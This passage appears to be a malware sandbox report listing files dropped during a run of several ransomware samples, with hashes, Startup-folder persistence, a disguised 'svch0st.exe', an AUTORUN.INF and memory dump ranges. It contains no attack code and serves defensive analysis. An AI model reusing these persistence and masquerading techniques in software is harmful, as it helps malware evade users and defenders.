f72f7910dd6db8f90aef1274f3fdcfd2

SHA1
2bf937c640eec713d09f753407585be9244b9cf9

SHA256
052d323a1585527001f687087f8f363d7f985ee787bcf15804e56ec141ac7263

SHA512
740e3c70c4a8cde043b2d1e4437ee75e4b389de1f00e5176c66eefa3fac8ac25380704a9f30a9b1105b61d1349aba9556891b1558baa892f9041531573cd4514

Download Submit
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Service Worker\CacheStorage\a401a5c3e5a6e316d830c597aeb6f7a2ff00e988\bce9ff4e-5609-492e-847c-04ea4490fb6e\index-dir\the-real-index~RFe5a54b9.TMP

Filesize
48B

MD5
6213b5c2fc24d0567fb62081ea7fa682

SHA1
c6772ea27f29f8f5b6a677c285810adb7578b833

SHA256
dfd8543e855f86e9b6649ee407a9f2deca289ffe5724af47f4fecbb8c7da36c9

SHA512
3252ad8b8b0005d15b9180b2c6e39b182556425bf007183904bca20291b2796034557b326cd80238127173a17c023dc5d53d8d697bb19f0d6fca7055ccaaa3ea

Download Submit
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Service Worker\CacheStorage\a401a5c3e5a6e316d830c597aeb6f7a2ff00e988\index.txt

Filesize
260B

MD5
1456f1b66e1addadbdff2d3ec0c963e5

SHA1
205ad1c46fb3f5c9187c284ebb509914cb4af82b

SHA256
09e987acc5a9a23351a100ecab18f3ff9b8f0faf2d84ca30f999c9e5b8546e43

SHA512
2319cb4c89f3402fccba6449db5aa94b3655534db9c7dd0c4b68aedcc2d1d93dfa32c16d827c83e99811d971b9f4149c65991e783439d4528cf6b120492e7b73

Download Submit
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Service Worker\CacheStorage\a401a5c3e5a6e316d830c597aeb6f7a2ff00e988\index.txt

Filesize
324B

MD5
bf07370d56353315c718980396030429

SHA1
b93f75fa65967459adfecdb9a595758091b9f912

SHA256
cd17ea189468855868490231371e2724b60abcf4d532da4f6580952460e4f85b

SHA512
509b8d3969e2a3335ab1cc5712425d49c4fb1a49a384411e8172ad1a4a3f0531fa089c13b97ba50c351bb4305ca4ea9c14a6ed9480ac7247ebbbf10ff3e9e241

Download Submit
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Service Worker\CacheStorage\a401a5c3e5a6e316d830c597aeb6f7a2ff00e988\index.txt

Filesize
323B

MD5
8d1ea48b51f87a6540abae2c9e1a8f70

SHA1
224749f2c5466e49f834db4b449dfc9ac7095254

SHA256
fc87b765ea52980fe485dfbf5ed046d5c8f98a493f8a4c8dcd791c7ddadd935c

SHA512
db61dd4a7fa0caa7a585e23d3ca3856714ca9bc158bf4ae94037a4812fe985faa869257179bc3ee242852745bd0984564e80ef7d6d60c7a1bea0e75b9f8d950b

Download Submit
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Service Worker\CacheStorage\a401a5c3e5a6e316d830c597aeb6f7a2ff00e988\index.txt~RFe5a4eec.TMP

Filesize
208B

MD5
7b02e5175db808f36ffd55434d60ec37

SHA1
4b3af73d3e0ec133db805a1fed3b2af73471365c

SHA256
61235294df32799b29a7fcd6a231d14f1df85364f04ca596ff3544197ea39920

SHA512
8677496c97a8e75732c74354d3b28952bcac2cc0bd410337e7f73c8867abe094e7073c4062f0cee13e73faaaa9cc58644c41e9204a6db17b0fa279e28eab32f4

Download Submit
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Service Worker\CacheStorage\f0a1ef1ab533153702e0a7f73b8d66e0b7e01d1d\index.txt

Filesize
104B

MD5
9fd106267e5f4a310d683dd1344d8ab9

SHA1
e8be8b5cac5f2264770cc7dd8d574762e6775992

SHA256
da9004518c82fe4b85af921b0bbda4b94ff626d07a083c123395aaddfd40e2cb

SHA512
d57f135837b794c60fd883bb6d48ee626c6fc14a1fabf16ce12cfe65eee5df73910490682e8ba1205ae891fc2d8df92e9651874a7e699bb64d11b349bb63b6c3

Download Submit
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Service Worker\CacheStorage\f0a1ef1ab533153702e0a7f73b8d66e0b7e01d1d\index.txt~RFe5a55e2.TMP

Filesize
111B

MD5
aa877312568e61f41aee91667cc48440

SHA1
33f03240a48f04065b34252fcc70d65f5b30776d

SHA256
56f31366738b4363f6e08d6802511f3b54dde4f7e27117ce57522981b029ff4a

SHA512
fb6d9322808ed7c5f92c59347620d8fed772149150fcfe7e9493e319becc2d035fc4bb3e3d5d1dfb13835b2bfd5ca827145abb6aa84f666000ae9ece7b8492ff

Download Submit
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
96B

MD5
cd8463a8a0652eeb8d52f18e4fe8cc66

SHA1
4f54424a88cc2a27bcf746b748ab2361b0b0f851

SHA256
df2f22cdbcfedf45a3d1ad932006e4137bbab0b32556c916827b51e8a1d9d3b0

SHA512
dffd78965c6e029a2c751151dc81446ee9a939573bd7567ad43275647b4a3cf62c93843e8fb9b05472a6545efd1c84d68ad1f7c4aacd89506dc82bd5ccad5f9c

Download Submit
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5a54a9.TMP

Filesize
48B

MD5
d9c88637d7863a418ef02ee8f458f356

SHA1
f70e97f575a5b63bfeeefd89f709b25549d91186

SHA256
f552903fd9705e75035deeda93a029817c164fac310aeb2d85c0f01729d7fd45

SHA512
e0b8cac459ffdaf89fdd52c93cdc630b3e92219de6548a304c4921a0b7aff76163f72b84610aa58951aae05340f09a7c78dca3f901f571975eac67e3af7bc567

Download Submit
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Site Characteristics Database\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Tablo Cache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\TurboAppCache\Nativecache\ba408d99-fb04-43f9-b131-da2ab77a4808\index-dir\the-real-index

Filesize
4KB

MD5
735921c7e8ce00e6627eb2de365c0763

SHA1
43603dc948ceae8179577bbe3b9ae6a95d915a47

SHA256
4cff87539f81506519fe4f52e0dad19b012c66d614f85040cacff418b52b6cd5

SHA512
f3479e9ef92bce32023177d974d28b0480e2bca7bf6edd336fdc0fefb86659a95c7cd492706bac854d3f2360694a92d1053db3a3424ef4115771c56c3fcf8caa

Download Submit
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\TurboAppCache\Nativecache\web_ntp_cache\index

Filesize
24B

MD5
54cb446f628b2ea4a5bce5769910512e

SHA1
c27ca848427fe87f5cf4d0e0e3cd57151b0d820d

SHA256
fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d

SHA512
8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

Download Submit
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Web Applications\Manifest Resources\bcadigmkecmhhknameopgaidphameinh\Icons\128.png

Filesize
11KB

MD5
363bbbffe31e45e3945aa0ff3b8cdd1d

SHA1
f223255a82218ddd45bdf54a0cf1e8b438a67edc

SHA256
39b835c3dcf4261025de83d49ab151f5af0bc1ed8845932065aa1a333f026684

SHA512
7bbfb3810a2bed3d2a8a899afa95412cca95fa6916b1684ae3182bd0ad28faa7076fdf328281d106a53c10385667729b4089b0050610e87eadef2f3ff54e80be

Download Submit
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Web Applications\Manifest Resources\bcadigmkecmhhknameopgaidphameinh\Icons\16.png

Filesize
699B

MD5
238b0e7dc06028db4b6aba8078740ffb

SHA1
5fd2309587993b371beabb7a9d039e0dba3006ba

SHA256
d159e510392f6da58c4d15cc098171d45c7b02a1362cbf7be7a2d47a1a10e7fc

SHA512
1dda4de21be647067c04dfc47174df39d0c6c1eeee3e9005211f908351b69d6a27ed268b5ec7480285fb203a95136a3a205f7bafb7eb5223a3dcbab0dadc0e5d

Download Submit
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Web Applications\Manifest Resources\bcadigmkecmhhknameopgaidphameinh\Icons\256.png

Filesize
24KB

MD5
a363094ba5e40a4760a9bf566e5defd3

SHA1
1e74e20f48ec878bd0b76448c722168879c5b387

SHA256
05ae2d6161a3acd83798ec56dbc45087e6aeb0a1376401f55aa46539b1d95559

SHA512
ce30f312cc08366aa588e75b229c178a83cf6d464a1051bd1118b81e5166085a2b1bcfbff97804f3e8662366b59f43a659e4b0e315dabad125f16ec9ad9ac379

Download Submit
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Web Applications\Manifest Resources\bcadigmkecmhhknameopgaidphameinh\Icons\32.png

Filesize
1KB

MD5
d2e7ab79b45eda7c4421f296abf37c52

SHA1
8490f4e098d50ec161e64db912f8430826daf2bc

SHA256
ded3490683fcf3c5b87803bb1835759df2b65831a6257a326709a708a1dd45ac

SHA512
094c2150f872e727980f84b6c011f13210d43cbfd9437825b3b014211c69d7bd3f6367e9913370b624ddad270cfe91c190ebf2c5f5fd4e082b5d6c85199cb6b1

Download Submit
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Web Applications\Manifest Resources\bcadigmkecmhhknameopgaidphameinh\Icons\48.png

Filesize
2KB

MD5
7cf35c8c1a7bd815f6beea2ef9a5a258

SHA1
758f98bfed64e09e0cc52192827836f9e1252fd1

SHA256
67c320fa485a8094fc91cd3fcd59a7c75d2474e3046a7eb274b01863257fbe01

SHA512
0bbebde654c9f44cf56b74fc1a9525b62c88724ec80658efede3cbb370c3a6d4f3e78df459bbd0559a51838f4a172bdfcd370bd5477038309024b77cd69f2a15

Download Submit
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Web Applications\Manifest Resources\bcadigmkecmhhknameopgaidphameinh\Icons\64.png

Filesize
4KB

MD5
6f5486bcca8c4ce582982a196d89ece5

SHA1
4648ae13d71b2ff681cabc5d0b5b4bb242cb78a2

SHA256
c870819a5c73e2ea5f94312bdf10fc56668d3311ef2eab6509b659efb456bb8d

SHA512
9a36d519a9cadf5b464a98082511906cc5f24c4218f6bc2ae323f6b38bf5fd413614807ef0d442801bfbc3b2ce2a0527b0f7be24fd51f49cbde6b5dfe2cafd7c

Download Submit
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Web Applications\Manifest Resources\bcadigmkecmhhknameopgaidphameinh\Icons\96.png

Filesize
7KB

MD5
115decbc3eb53574b2582f15a0996e83

SHA1
598a1d495135f767be6d03cf50418615b22146b6

SHA256
07fbfbda84eb5467b120fb3f9b4e028077303098bac8c2934635b14bbda847e0

SHA512
af237ddb585ad38fd0fc3d0f0b75c60d0117e965a548bda055b2625f86ee7d91fedc840e1afa2fe80814f152732371255133faa21c3d774ca9691446541cf46c

Download Submit
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\affb299d-a966-43c6-a06a-ac180a84baf8.tmp

Filesize
160KB

MD5
54497ce2271deb0e673ec048b44da343

SHA1
5f886314234b7aa6a4da5efc937a9d63ed007727

SHA256
3dcf052bb8050fa32f28873bb665f63f457799cb9a92549fb2dbea94014f929b

SHA512
d0d77d763b1b12c1b9d7a9a3f2aee4640ed5fb10d828b7c3c2cb051504c2b7b6438309124b934b346a4152c0aca009883d6bda42dc997188b8ca2736ac3419c9

Download Submit
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\turboapp_db.json

Filesize
40KB

MD5
9b5019f89a3e11abe3db0afaba620ba9

SHA1
64b5aea8a26617e865d61ecea492455d20a76124

SHA256
83a2b2174bd1c4880ac33a8fb7d3fcfb98337f91db3456d7f605d3eb0a572618

SHA512
c0c74c70299c3e082033ee658e35ebd94a89a19a98328af0f3c140ae7201043d6dd8e810cd0f27b93140a4f4ba909257f676d43edffcd70de3b2ce03452fbd0c

Download Submit
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\turboapp_db.json

Filesize
40KB

MD5
c3c0c5fc24f3bf99038367c81a3ae2b8

SHA1
f77569e233ce61a1f2145d2d7d4b2e53f6a0db5d

SHA256
85c3baea4620ef025384eaf2a5025f53e84f3f7880d83892da0c383b07bdfd74

SHA512
76666e4cee7a4ca53412cf5e1cd0a50b6f45f7921bc766ed6dd88ce5ecfa4d420a479377bd6bc55603e0b945dd849f8044022086cadcca2d8afc686dc9ecd1d9

Download Submit
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\turboapp_db.json~RFe59f9a8.TMP

Filesize
24KB

MD5
fa3532c023ea8d58a49418a4d16f7a55

SHA1
831fdd60a1890e5a5e355e6d6d3a7043078a00ba

SHA256
e873917786b73a92efbf8caabecc257ee9f1571210423e07338b672ba7c922a0

SHA512
76b59590bc2e3154b97df2c3013c66a335b2c194dc12309ab76ff3585ec5b2f34053890b8bd33485394be6fb43b4a73ddce4e5f9e456349f36e3453870246969

Download Submit
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Local State

Filesize
231KB

MD5
871cd7f99b5045b81249fdc84d1a045d

SHA1
69717a562c0fde095f55391fa218a9e99dbec3ec

SHA256
fd3ec13fa698fc7f2ac2c555d690a5cec094cbf53599c2db399ec8d0a2fc8fc8

SHA512
58982dfbb5f7f6cd24b91868abaeb01f39ba29dc87a6244b43254097337022a372cc4bd9391c54f511be2685d4490a9a372955c1520ae3a53a0e4bd1cbb406f7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe

Filesize
440KB

MD5
52b973c029f230ba1049d1438ff7a960

SHA1
c7c8790cd93463fea65921abfb44a5ed81788ab5

SHA256
a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6

SHA512
7b3b7aff02e7e15c557c618abfd243bb3b6510914aa8b2ea1eef76186c2ef7045a3848cded0b4530c67c113824c5b066fbca18df0f8a09e3e76795947d458605

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\em0f2daf.Admin\places.sqlite-20241105221145.133788.backup

Filesize
68KB

MD5
314cb7ffb31e3cc676847e03108378ba

SHA1
3667d2ade77624e79d9efa08a2f1d33104ac6343

SHA256
b6d278384a3684409a2a86f03e4f52869818ce7dd8b5779876960353f7d35dc1

SHA512
dc795fa35ea214843a781ee2b2ef551b91b6841a799bef2c6fb1907d90f6c114071a951ebb7b2b30e81d52b594d447a26ab12ddb57c331e854577d11e5febef5

Download Submit
C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Bookmarks

Filesize
2KB

MD5
59bc90e4598dc02a2120e5ad54a8c261

SHA1
f3ca5e7807b99dac800c82d0be005c0a33ee6cde

SHA256
2d261af1bb12cf7bc1036469c2f8416535c539e6b29a5a6b244e466a6ae05eef

SHA512
027739f6b06de3fdd3dbc19ef7fa2e29318591034bd7c5a54d3a11a83a3de9f0123f1f56076f5443cae7a095b0403dd33f6b65dc0168d84e556396c5af990a89

Download Submit
C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Bookmarks-20241105221145.290039.backup

Filesize
1KB

MD5
3adec702d4472e3252ca8b58af62247c

SHA1
35d1d2f90b80dca80ad398f411c93fe8aef07435

SHA256
2b167248e8136c4d45c2c46e2bff6fb5e5137dd4dfdccde998599be2df2e9335

SHA512
7562e093d16ee6305c1bb143a3f5d60dafe8b5de74952709abc68a0c353b65416bf78b1fa1a6720331615898848c1464a7758c5dfe78f8098f77fbfa924784c0

Download Submit
C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\BookmarksExtras

Filesize
19KB

MD5
bfca35f3b49e9dbcd1b0cdb9b2b2cf18

SHA1
bae51f81fec359d981ed8ced56a5a4a53d90c28f

SHA256
d9cc75d9815c432d24bc56533bb47701cd40e7d43221c296bc6004c0d99465ac

SHA512
150714fc94e00e2e11f083ae42a4200ecb32b587e12cf13b63979afce9c9a48d3804af526d9ce641250a24ac61de249db707f06a3546ad1b312cbda5f93e7d64

Download Submit
C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Preferences

Filesize
318B

MD5
e008c3412c4d4b93ac92078866c069eb

SHA1
ecc09219949f386152bb292c18cd4ee97bbbf2a7

SHA256
d59d2f5ac6739824d9cb312df98ba6879b2d469ba69f417010d6ed9acf4bbe74

SHA512
149fe0a322e5bc36d613a7ccc2ce31f9d6888ee8d7f84c31ee75d3aa1a8b96e5b6215fc5abfd066009cfddb22681affa15ce80ce005d14df56c03b87c9b6e8f9

Download Submit
C:\Users\Admin\Desktop\00371\HEUR-Trojan-Ransom.MSIL.Crusis.gen-e0f40f3c8d4c3799fec048acc0ced8270563378a621a8762c5ff4ecc21af8292.exe

Filesize
942KB

MD5
674b512fced579c93bca10aceda771fa

SHA1
bcfaae71c11d87ac73cc156aecb88198d1c2caa4

SHA256
e0f40f3c8d4c3799fec048acc0ced8270563378a621a8762c5ff4ecc21af8292

SHA512
a62964a55f9f7e9de9c854a9369c99328150adc3202c5eba4cd9e4e26dca67be7d0fd0dd8752ffed04bd9c74c3b52ce7a6bd65b37b75a9d210fc4b33af9c457a

Download Submit
C:\Users\Admin\Desktop\00371\HEUR-Trojan-Ransom.Win32.Bitman.pef-44ebaf4e63fff8d32b82f43078b4a786052d0a7b1cb4c82e491c10099df3e7d8.exe

Filesize
344KB

MD5
191c897fdfb332432cd3d68a3f6eb100

SHA1
e5e996955730d0c2764e7ba1cd9e27bbb6e8d83e

SHA256
44ebaf4e63fff8d32b82f43078b4a786052d0a7b1cb4c82e491c10099df3e7d8

SHA512
b0959a565669166996ba6fd4761fcd633df06f2f5b60d6aa5290a0e227298d8122505cd777e1e2ca28d188125bf086434caf076683530941aaf83d6d3d84b32a

Download Submit
C:\Users\Admin\Desktop\00371\HEUR-Trojan-Ransom.Win32.Bitman.vho-67050ba69d0531459e14b74d23c29f0691330b5b020097e4167cb22311077748.exe

Filesize
304KB

MD5
1c294e0e2125049ab7c77e824c9a2800

SHA1
f0615e5a7a774f4000a8a095fb49ac7cc6c2a770

SHA256
67050ba69d0531459e14b74d23c29f0691330b5b020097e4167cb22311077748

SHA512
dcfff1320ca5499ac6e74c59259f0a2968fd8527714e8a601e6c5eb78cb1415a256a4b14c251124b448577c168baad4eb6b8b35bd3870e3c9b2ae33de454ba20

Download Submit
C:\Users\Admin\Desktop\00371\HEUR-Trojan-Ransom.Win32.Encoder.gen-34b0dc15655965a488415da87322be5aa9625d6ade8374765b6a311fc989bbdf.exe

Filesize
201KB

MD5
55fa4710bad50953b750a5e3f778c651

SHA1
c74a5e3b677ddafb5f08310d46ba1788d348a895

SHA256
34b0dc15655965a488415da87322be5aa9625d6ade8374765b6a311fc989bbdf

SHA512
05e139c295163dc5dfca044f364f2d63db88405b5c0440be6009bbb87a559fe902d808059c936c470f002f08c98eb29cdc07c8ac951c0f702931b062ee646a3b

Download Submit
C:\Users\Admin\Desktop\00371\HEUR-Trojan-Ransom.Win32.GandCrypt.gen-1a9f6f4967284cd122ee3447eac174f4513103b88b8364a698866eea4a7f773b.exe

Filesize
321KB

MD5
e400e73df69712a327c70c3deca001f2

SHA1
3d301b4d66c3984b4ccf1530dc5ead8d8dbdbbf4

SHA256
1a9f6f4967284cd122ee3447eac174f4513103b88b8364a698866eea4a7f773b

SHA512
69cc7a68232157cae9a485ed34cc0641c41edc9ce7d812df6bd54c48b8776208ff7fd285ec156635f7287fd03234a7b7f5c03c9eb4278e8c158ad7db9b62aaf0

Download Submit
C:\Users\Admin\Desktop\00371\HEUR-Trojan-Ransom.Win32.PolyRansom.gen-681b516d2b438bec4075d00701007c8cf49981d864bef9a0f81dadf3b78599bc.exe

Filesize
947KB

MD5
aed0668c807c7b4840eb70efcedb1b14

SHA1
af4a395af5b5a2672a8444abd8863f209bb747dd

SHA256
681b516d2b438bec4075d00701007c8cf49981d864bef9a0f81dadf3b78599bc

SHA512
01daa27c274d5cd131ea8db43ec056b25dc7adf4af6db6279e2b8656e4b3660349d872a4c574f5a3aa34c43126c4d5ecba907a16a2ec4607ab69d099e573cec8

Download Submit
C:\Users\Admin\Desktop\00371\HEUR-Trojan-Ransom.Win32.Shade.gen-b89ae460c4a36180e3fe0e578e5f36354c438ae36324beaeef889ff69425653b.exe

Filesize
1.3MB

MD5
489e96c53f1ee376aca49285379a6757

SHA1
62a5125fbf97dc0a6ab5280e32a0b181dc026b8b

SHA256
b89ae460c4a36180e3fe0e578e5f36354c438ae36324beaeef889ff69425653b

SHA512
d54e215780b7c00d4060a37446ae508012bdd314c7b04f5feb263a096aee7b4525f127516f066444f97f65324201f88a996ea55010545c3b3f1379640a5c9362

Download Submit
C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.Bitman.afoy-d4b908f9c294902196657c7b566046f058b2b58a63cfa49abf85e9e300bb8f14.exe

Filesize
467KB

MD5
825afad02d07063689b7b59e8cf46809

SHA1
3f247a5c20c7ca3e4334aca780180edeb1e29d7f

SHA256
d4b908f9c294902196657c7b566046f058b2b58a63cfa49abf85e9e300bb8f14

SHA512
25e237c5d5bd3aa9cb9b6c80e480ebe668772f7f39543578b80aec443629d11f70a7c91e0a74d7e3e0ff50740bf0c136657a7f04387d7dfd28dd4acfe658b6ff

Download Submit
C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.PornoAsset.dggw-f0c7d7525fdd13a49730e5cef8d6ea3d95361dbd439082c2c0701139460fa708.exe#$.exe

Filesize
664KB

MD5
2eb5d76180ce7b3241b281fa79ab3483

SHA1
06293dea80e39c7eb7ee2bdb00d60b58d932fa8a

SHA256
e1b9beb4617a720d55afaec364941bb18ea2c456a8b06b30a736f0cbb5c297e8

SHA512
35f553c76fc67afb88a6a090fcbad6af3e2faae154c9c84bd869714194012525a2d42b76dad855805f107a37c351f0de08fd9a03d8ddc1dd400d64640d81b90b

Download Submit
C:\Users\Admin\cftmon.exe

Filesize
1.0MB

MD5
20d966af0894f615a85ee5d1b383e57d

SHA1
fe7468b8d18bc6840ea23b67ab396d892f9c3953

SHA256
bb0f702d45809700a005ad083cfae350724fdc198a9a6d620612640fff02c943

SHA512
2ce0947a05274e2aa6eba5bb05a9383dc05798a11a33965d26fa58ee67b184a3b182b7b972a043b4763555992fe6535583493b96e99f6f4f7b921a041466af7e

Download Submit
C:\Users\Admin\cftmon.exe

Filesize
943KB

MD5
601492d4941674a5edf267679fa12bee

SHA1
d82462c9355d08d25dfc7723e93c8d3cb433f336

SHA256
db148377b7a70acc484f1c48e1d1dabdccde6da2c5464a26942b75646ea49f52

SHA512
baa95161417784cc4e40c4a4d325f1b3e6edcf3e40a5768ad8985e9aa812ff0d81ed909a318013a500273508bfd7e694aca7ff51250ba3e6943ebf9fe4b3ca88

Download Submit
C:\Windows\Installer\MSICE09.tmp

Filesize
181KB

MD5
0c80a997d37d930e7317d6dac8bb7ae1

SHA1
018f13dfa43e103801a69a20b1fab0d609ace8a5

SHA256
a5dd2f97c6787c335b7807ff9b6966877e9dd811f9e26326837a7d2bd224de86

SHA512
fe1caef6d727344c60df52380a6e4ab90ae1a8eb5f96d6054eced1b7734357ce080d944fa518cf1366e14c4c0bd9a41db679738a860800430034a75bb90e51a5

Download Submit
C:\Windows\Installer\MSICF14.tmp

Filesize
189KB

MD5
e6fd0e66cf3bfd3cc04a05647c3c7c54

SHA1
6a1b7f1a45fb578de6492af7e2fede15c866739f

SHA256
669cc0aae068ced3154acaecb0c692c4c5e61bc2ca95b40395a3399e75fcb9b2

SHA512
fc8613f31acaf6155852d3ad6130fc3b76674b463dcdcfcd08a3b367dfd9e5b991e3f0a26994bcaf42f9e863a46a81e2520e77b1d99f703bcb08800bdca4efcb

Download Submit
C:\Windows\SysWOW64\svch0st.exe

Filesize
1.2MB

MD5
412b337e1305e671ff63d1794be37505

SHA1
fb1fae3553fb2cfb3772040aaeafc89f8a895a2a

SHA256
0b2a14027c6d42947bea68c224bb283ea9bc28697650ef15d7433099cbedbeec

SHA512
b1b1339b59b22a22c5bde15228d3732e7efbbc8897e595c7390682f23774fd72b08e6a08115d795ba88a3bf8b9cd2ce50108fa3e8ad5dc42894c893943216366

Download Submit
C:\Windows\System32\Trojan-Ransom.Win32.Foreign.oifc-e70d17459b65c266bd5c8eefc2e76b2c2709bf629e01e71c27d09382ac18dc3e.exe

Filesize
575KB

MD5
17def0b2cf60129ab52edc4a0db0db00

SHA1
e62c0152463cd5e494b307f0ba160a99a70a0266

SHA256
e70d17459b65c266bd5c8eefc2e76b2c2709bf629e01e71c27d09382ac18dc3e

SHA512
2b435e7c517ac4e6aefb807df751feb220fe8dfb5747899cc8a17d5aea99caf5555917ea6fa1b0b6521490a1a1c812d58a9fdf18b8432e308994c50bc0a7b890

Download Submit
C:\stop

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
F:\AUTORUN.INF

Filesize
145B

MD5
ca13857b2fd3895a39f09d9dde3cca97

SHA1
8b78c5b2ec97c372ebdcef92d14b0998f8dd6dd0

SHA256
cfe448b4506a95b33b529efa88f1ac704d8bdf98a941c065650ead27609318ae

SHA512
55e5b5325968d1e5314527fb2d26012f5aae4a1c38e305417be273400cb1c6d0c22b85bddb501d7a5720a3f53bb5caf6ada8a7894232344c4f6c6ef85d226b47

Download Submit
memory/768-438-0x0000000005710000-0x000000000573C000-memory.dmp

Filesize
176KB

Download
memory/768-673-0x0000000005740000-0x000000000574A000-memory.dmp

Filesize
40KB

Download
memory/768-441-0x0000000005940000-0x00000000059A6000-memory.dmp

Filesize
408KB

Download
memory/768-125-0x0000000000D00000-0x0000000000DF2000-memory.dmp

Filesize
968KB

Download
memory/768-680-0x0000000005760000-0x0000000005766000-memory.dmp

Filesize
24KB

Download
memory/768-132-0x0000000005830000-0x00000000058C2000-memory.dmp

Filesize
584KB

Download
memory/768-679-0x0000000005750000-0x000000000575C000-memory.dmp

Filesize
48KB

Download
memory/768-666-0x0000000005B80000-0x0000000005D42000-memory.dmp

Filesize
1.8MB

Download
memory/768-675-0x0000000006AE0000-0x0000000007084000-memory.dmp

Filesize
5.6MB

Download
memory/768-674-0x00000000059E0000-0x0000000005A02000-memory.dmp

Filesize
136KB

Download
memory/1776-169-0x0000000071580000-0x00000000715B9000-memory.dmp

Filesize
228KB

Download
memory/1776-126-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/1776-161-0x0000000071580000-0x00000000715B9000-memory.dmp

Filesize
228KB

Download
memory/1776-168-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/2108-109-0x00000126FFF90000-0x00000126FFFD4000-memory.dmp

Filesize
272KB

Download
memory/2108-110-0x0000012700080000-0x00000127000F6000-memory.dmp

Filesize
472KB

Download
memory/2108-104-0x00000126FF6F0000-0x00000126FF712000-memory.dmp

Filesize
136KB

Download
memory/2108-112-0x00000126FFF40000-0x00000126FFF5E000-memory.dmp

Filesize
120KB

Download
memory/2216-423-0x0000000000400000-0x0000000000469000-memory.dmp

Filesize
420KB

Download
memory/2420-194-0x0000000000400000-0x0000000000608000-memory.dmp

Filesize
2.0MB

Download
memory/2420-195-0x0000000000400000-0x0000000000608000-memory.dmp

Filesize
2.0MB

Download
memory/2420-9803-0x0000000000400000-0x0000000000608000-memory.dmp

Filesize
2.0MB

Download
memory/2420-430-0x0000000000400000-0x0000000000608000-memory.dmp

Filesize
2.0MB

Download
memory/2420-193-0x0000000000400000-0x0000000000608000-memory.dmp

Filesize
2.0MB

Download
memory/2420-198-0x0000000000400000-0x0000000000608000-memory.dmp

Filesize
2.0MB

Download
memory/2420-196-0x0000000000400000-0x0000000000608000-memory.dmp

Filesize
2.0MB

Download
memory/2420-9326-0x0000000000400000-0x0000000000608000-memory.dmp

Filesize
2.0MB

Download
memory/2420-10981-0x0000000000400000-0x0000000000608000-memory.dmp

Filesize
2.0MB

Download
memory/2420-199-0x0000000000400000-0x0000000000608000-memory.dmp

Filesize
2.0MB

Download
memory/2724-9327-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/2724-437-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/2724-174-0x00000000712B0000-0x00000000712E9000-memory.dmp

Filesize
228KB

Download
